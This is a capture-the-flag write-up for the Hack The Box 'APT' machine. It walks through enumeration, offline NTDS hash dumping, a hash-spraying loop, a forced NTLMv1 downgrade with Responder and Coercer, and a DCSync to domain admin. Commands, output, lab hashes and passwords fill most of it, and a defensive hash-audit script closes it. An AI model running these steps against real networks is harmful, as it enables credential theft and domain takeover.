HTB APT box
Information gathering
nmap
$ nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.96.60
Nmap scan report for gigantichosting.com (10.129.96.60)
Host is up (0.91s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
$ nmap -sT -sC -sV -O -p80,135 -oA nmapscan/detail 10.129.96.60
Nmap scan report for 10.129.96.60
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
So the operating system is Windows, with ports 80 and 135 open.
Web-80
The site is mostly static content. Reading the source reveals one comment:
<!-- Mirrored from 10.13.38.16/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:13:45 GMT -->
It was probably mirrored from another site, but that does not help us at this point.
There is nothing interesting on the site, and directory brute-forcing finds no sensitive files either:
./feroxbuster -u http://10.129.96.60/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.96.60/
🚩 In-Scope Url │ 10.129.96.60
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 147c http://10.129.96.60/css => http://10.129.96.60/css/
301 GET 2l 10w 146c http://10.129.96.60/js => http://10.129.96.60/js/
301 GET 2l 10w 150c http://10.129.96.60/images => http://10.129.96.60/images/
200 GET 50l 118w 1268c http://10.129.96.60/js/nav.js
200 GET 21l 97w 7075c http://10.129.96.60/images/c-logo1.png
200 GET 147l 412w 5528c http://10.129.96.60/news.html
200 GET 357l 990w 8188c http://10.129.96.60/css/owl.carousel.css
200 GET 24l 156w 11339c http://10.129.96.60/images/c-logo4.png
200 GET 243l 870w 10592c http://10.129.96.60/services.html
200 GET 23l 133w 10584c http://10.129.96.60/images/c-logo.png
200 GET 347l 1094w 14879c http://10.129.96.60/index.html
200 GET 33l 144w 12681c http://10.129.96.60/images/c-logo5.png
200 GET 23l 123w 9804c http://10.129.96.60/images/c-logo3.png
200 GET 155l 468w 6326c http://10.129.96.60/support.html
200 GET 274l 958w 12146c http://10.129.96.60/clients.html
200 GET 21l 187w 12696c http://10.129.96.60/images/logo.png
200 GET 211l 718w 9386c http://10.129.96.60/about.html
200 GET 33l 161w 11330c http://10.129.96.60/images/c-logo6.png
200 GET 4l 48w 17807c http://10.129.96.60/fonts/css/font-awesome.min.css
200 GET 1470l 3315w 37908c http://10.129.96.60/js/owl.carousel.js
200 GET 1585l 3117w 28067c http://10.129.96.60/css/style.css
301 GET 2l 10w 150c http://10.129.96.60/Images => http://10.129.96.60/Images/
200 GET 4l 1421w 96381c http://10.129.96.60/js/jquery.min.js
200 GET 5785l 13825w 121276c http://10.129.96.60/css/bootstrap.css
200 GET 347l 1094w 14879c http://10.129.96.60/
301 GET 2l 10w 149c http://10.129.96.60/fonts => http://10.129.96.60/fonts/
403 GET 29l 92w 1233c http://10.129.96.60/fonts/
301 GET 2l 10w 153c http://10.129.96.60/fonts/css => http://10.129.96.60/fonts/css/
403 GET 29l 92w 1233c http://10.129.96.60/fonts/css/
301 GET 2l 10w 147c http://10.129.96.60/CSS => http://10.129.96.60/CSS/
403 GET 29l 92w 1233c http://10.129.96.60/fonts/fonts/
301 GET 2l 10w 155c http://10.129.96.60/fonts/fonts => http://10.129.96.60/fonts/fonts/
301 GET 2l 10w 153c http://10.129.96.60/fonts/CSS => http://10.129.96.60/fonts/CSS/
301 GET 2l 10w 146c http://10.129.96.60/JS => http://10.129.96.60/JS/
301 GET 2l 10w 146c http://10.129.96.60/Js => http://10.129.96.60/Js/
301 GET 2l 10w 147c http://10.129.96.60/Css => http://10.129.96.60/Css/
301 GET 2l 10w 153c http://10.129.96.60/fonts/Css => http://10.129.96.60/fonts/Css/
301 GET 2l 10w 150c http://10.129.96.60/IMAGES => http://10.129.96.60/IMAGES/
301 GET 2l 10w 149c http://10.129.96.60/Fonts => http://10.129.96.60/Fonts/
301 GET 2l 10w 153c http://10.129.96.60/Fonts/css => http://10.129.96.60/Fonts/css/
301 GET 2l 10w 155c http://10.129.96.60/fonts/Fonts => http://10.129.96.60/fonts/Fonts/
403 GET 29l 92w 1233c http://10.129.96.60/Fonts/Fonts/
301 GET 2l 10w 155c http://10.129.96.60/Fonts/fonts => http://10.129.96.60/Fonts/fonts/
301 GET 2l 10w 153c http://10.129.96.60/Fonts/CSS => http://10.129.96.60/Fonts/CSS/
301 GET 2l 10w 153c http://10.129.96.60/Fonts/Css => http://10.129.96.60/Fonts/Css/
301 GET 2l 10w 155c http://10.129.96.60/Fonts/Fonts => http://10.129.96.60/Fonts/Fonts/
400 GET 6l 26w 324c http://10.129.96.60/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/images/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/js/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Images/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/CSS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/JS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/CSS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Js/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/Css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/IMAGES/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/Fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/Fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/CSS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/Css/error%1F_log
[####################] - 4m 660085/660085 0s found:68 errors:26
[####################] - 4m 30000/30000 138/s http://10.129.96.60/
[####################] - 4m 30000/30000 140/s http://10.129.96.60/css/
[####################] - 4m 30000/30000 139/s http://10.129.96.60/js/
[####################] - 4m 30000/30000 139/s http://10.129.96.60/images/
[####################] - 4m 30000/30000 138/s http://10.129.96.60/fonts/
[####################] - 4m 30000/30000 138/s http://10.129.96.60/fonts/css/
[####################] - 4m 30000/30000 139/s http://10.129.96.60/Images/
[####################] - 4m 30000/30000 140/s http://10.129.96.60/fonts/fonts/
[####################] - 4m 30000/30000 140/s http://10.129.96.60/CSS/
[####################] - 4m 30000/30000 141/s http://10.129.96.60/fonts/CSS/
[####################] - 4m 30000/30000 142/s http://10.129.96.60/JS/
[####################] - 4m 30000/30000 143/s http://10.129.96.60/Js/
[####################] - 4m 30000/30000 143/s http://10.129.96.60/Css/
[####################] - 4m 30000/30000 143/s http://10.129.96.60/fonts/Css/
[####################] - 3m 30000/30000 144/s http://10.129.96.60/IMAGES/
[####################] - 3m 30000/30000 146/s http://10.129.96.60/Fonts/
[####################] - 3m 30000/30000 146/s http://10.129.96.60/Fonts/css/
[####################] - 3m 30000/30000 146/s http://10.129.96.60/fonts/Fonts/
[####################] - 3m 30000/30000 145/s http://10.129.96.60/Fonts/Fonts/
[####################] - 3m 30000/30000 147/s http://10.129.96.60/Fonts/fonts/
[####################] - 3m 30000/30000 147/s http://10.129.96.60/Fonts/CSS/
[####################] - 3m 30000/30000 151/s http://10.129.96.60/Fonts/Css/
Attention now turns to port 135.
RPC-135
By querying the RPC locator service and the individual endpoints, you can determine how RPC services are exposed over TCP, UDP, HTTP and SMB. Tools such as rpcdump help identify the unique RPC services, denoted by their IFID values, revealing service details and communication bindings:
rpcdump.py 10.129.96.60
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Retrieving endpoint list from 10.129.96.60
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
ncacn_ip_tcp:10.129.96.60[49664]
ncalrpc:[WindowsShutdown]
ncacn_np:\\APT[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc06EBC0]
............
............
[*] Received 266 endpoints.
Use IOXIDResolver to identify the target's IP addresses:
python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::18d3:cd16:e553:73c4
Address: dead:beef::b885:d62a:d679:573f
IPV6 & nmap
After adding the IPv6 address to the hosts file and scanning again with nmap, many more open ports appear.
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49673/tcp open unknown
49685/tcp open unknown
58200/tcp open unknown
smb-445
SMB allows anonymous (null session) access:
$ netexec smb -6 htb.local -u '' -p '' --shares
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [+] htb.local\:
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [*] Enumerated shares
SMB dead:beef::18d3:cd16:e553:73c4 445 APT Share Permissions Remark
SMB dead:beef::18d3:cd16:e553:73c4 445 APT ----- ----------- ------
SMB dead:beef::18d3:cd16:e553:73c4 445 APT backup READ
SMB dead:beef::18d3:cd16:e553:73c4 445 APT IPC$ Remote IPC
SMB dead:beef::18d3:cd16:e553:73c4 445 APT NETLOGON Logon server share
SMB dead:beef::18d3:cd16:e553:73c4 445 APT SYSVOL Logon server share
The backup share is the notable one; it contains a file named backup.zip.
$ unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
0 2020-09-23 19:40 Active Directory/
50331648 2020-09-23 19:38 Active Directory/ntds.dit
16384 2020-09-23 19:38 Active Directory/ntds.jfm
0 2020-09-23 19:40 registry/
262144 2020-09-23 19:22 registry/SECURITY
12582912 2020-09-23 19:22 registry/SYSTEM
--------- -------
63193088 6 files
Cracking the archive password with a tool gives iloveyousomuch; use that password to extract the contents.
henry.vinson_adm
A quick search shows that the files in the archive can be used to dump the user hashes offline.
$ secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL > backup_ad_dump
$ cat backup_ad_dump
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
............
............
Trying psexec.py and evil-winrm with the Administrator hash to log in, but neither works.
Enumerating valid users
There are far too many users, a full two thousand, so I need to know which of them are valid. TCP 88 is open, so Kerbrute can be used to check for valid users.
Extract all the usernames:
$ cat userr.txt
Administrator
Guest
krbtgt
DefaultAccount
jeb.sloan
ranson.mejia
unice.daugherty
............
............
Enumerate with kerbrute:
$ ./kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb ~/notes/HTB/APT/userr.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/07/26 - Ronnie Flathers @ropnop
2026/01/07 01:42:48 > Using KDC(s):
2026/01/07 01:42:48 > apt.htb:88
2026/01/07 01:42:55 > [+] VALID USERNAME: Administrator@htb.local
2026/01/07 01:47:28 > [+] VALID USERNAME: henry.vinson@htb.local
2026/01/07 02:03:10 > [+] VALID USERNAME: APT$@htb.local
2026/01/07 02:03:10 > Done! Tested 2000 usernames (3 valid) in 1221.316 seconds
Only three accounts in the APT domain are valid: admin, APT$ and henry.vinson. Given the current context, the first thing to try is authenticating as henry.vinson with the hash dumped for that user.
$ netexec smb -6 htb.local -u henry.vinson -H 2de80758521541d19cabba480b260e8f
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [-] htb.local\henry.vinson:2de80758521541d19cabba480b260e8f STATUS_LOGON_FAILURE
Unfortunately, the hash is invalid.
Hash reuse
Consider whether some other hash from the dump works for henry.vinson. netexec stops responding entirely after a certain number of attempts; presumably a defensive mechanism is isolating the requests. Try other tools instead, such as getTGT.py and pyKerbrute.
getTGT.py requests a TGT as long as the username and hash are correct, and writes a credential cache into the current directory.
#!/bin/bash
# Read one NT hash per line from hashh.txt and try each one for henry.vinson;
# a matching hash produces a .ccache file in the current directory.
while IFS='' read -r LINE || [ -n "${LINE}" ]
do
    echo "Feed the Hash"
    getTGT.py htb.local/henry.vinson@htb.local -hashes ":${LINE}"
done < hashh.txt
Watch for a credential cache file being created:
watch "ls -lrt | tail -2"
pyKerbrute takes a user list and a single hash and attempts Kerberos authentication for every user. A simple modification lets it try a single user against many hashes instead.
Eventually a matching pair is found: henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
reg.py
Try psexec.py and evil-winrm again with this hash. Unfortunately henry.vinson has no WinRM rights and is not an administrator (so psexec cannot be used either).
There are still things that can be done, such as querying the registry remotely:
$ reg.py -hashes ':e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
The HKU hive holds per-user information, and a set of credentials turns up under it:
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
With these credentials you can log in over WinRM and collect user.txt from C:\Users\henry.vinson_adm\desktop.
administrator
The machine has only two active users, henry.vinson and henry.vinson_adm, plus one administrator account.
A PowerShell history file is present:
$ ls C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/10/2020 10:58 AM 458 ConsoleHost_history.txt
Its contents are interesting:
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
This looks like a deliberate hint from the box. lmcompatibilitylevel is the Windows authentication security policy that controls which LM/NTLM authentication methods the system allows. A value of 2 tells us the machine authenticates with NTLMv1, which is very insecure.
Confirm on APT that the setting is actually in effect:
*Evil-WinRM* PS C:\> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel
lmcompatibilitylevel : 2
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Responder
Use Coercer and Responder to capture a Net-NTLMv1 response. In Responder.conf, set the challenge to 1122334455667788.
Per the documentation, the --lm flag forces the downgrade:
$ sudo responder -I tun0 --lm
$ sudo coercer coerce -l 10.10.11.200 -t dead:beef::18d3:cd16:e553:73c4 -u administrator -p G1#Ny5@2dvht -d local.htb
The NTLMv1 response comes in:
[SMB] NTLMv1 Client : 10.129.4.8
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Now submit it to crack.sh, or crack it with hashcat:
hashcat -m 14000 -a 3 -1 DES_full.charset --hex-charset hashcat.txt ?1?1?1?1?1?1?1?1
The resulting NT hash is: d167c3238864b12f5f82feae86a7f798
Dump
This hash does not allow an evil-winrm login, but it can be used for a DCSync attack.
$ secretsdump.py local.htb/apt\$@local.htb -target-ip dead:beef::18d3:cd16:e553:73c4 -hashes :d167c3238864b12f5f82feae86a7f798
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...
This yields the hashes of the remaining AD accounts, and the administrator hash logs in successfully.
root.txt is in C:\Users\Administrator\desktop.
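The two dumps above (the offline one from backup.zip and the live DCSync one) differ for almost every account, which is what made the backup hash for henry.vinson stale. From a defender's side the same comparison is the first question after a leaked ntds.dit backup: which accounts still share a hash with the leak, which have an empty password, and which machine accounts were re-created. The following is an added example, not part of the original writeup; it parses the secretsdump line format (domain\uid:rid:lmhash:nthash:::) and runs that audit over a few lines taken from the dumps above.

```python
import re

# Well-known constants: NT hash of the empty string and the "no LM hash" placeholder.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# One secretsdump output line: user:rid:lmhash:nthash:::  (status lines like "[*] ..." are skipped)
LINE_RE = re.compile(r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

# Sample input: lines copied from the two dumps in this writeup (offline backup vs. live DCSync).
BACKUP_DUMP = """[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
"""
LIVE_DUMP = """[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
"""


def parse_dump(text):
    """Map user -> (rid, lmhash, nthash) for every hash line in a secretsdump output."""
    accounts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts[m["user"]] = (int(m["rid"]), m["lm"].lower(), m["nt"].lower())
    return accounts


def audit(backup, live):
    """Return sorted (user, finding) pairs: empty passwords, stored LM hashes,
    hashes unchanged since the leaked backup, and RIDs that changed (account re-created)."""
    findings = []
    for user, (rid, lm, nt) in live.items():
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored"))
        if user in backup:
            old_rid, _, old_nt = backup[user]
            if old_nt == nt:
                findings.append((user, "unchanged since backup"))
            if old_rid != rid:
                findings.append((user, "RID changed since backup"))
    return sorted(findings)


def run_sample():
    return audit(parse_dump(BACKUP_DUMP), parse_dump(LIVE_DUMP))
```

On the sample, only Guest and DefaultAccount still match the leaked backup (both with the empty-string hash), and APT$ shows a RID change, meaning the machine account was re-created after the backup was taken.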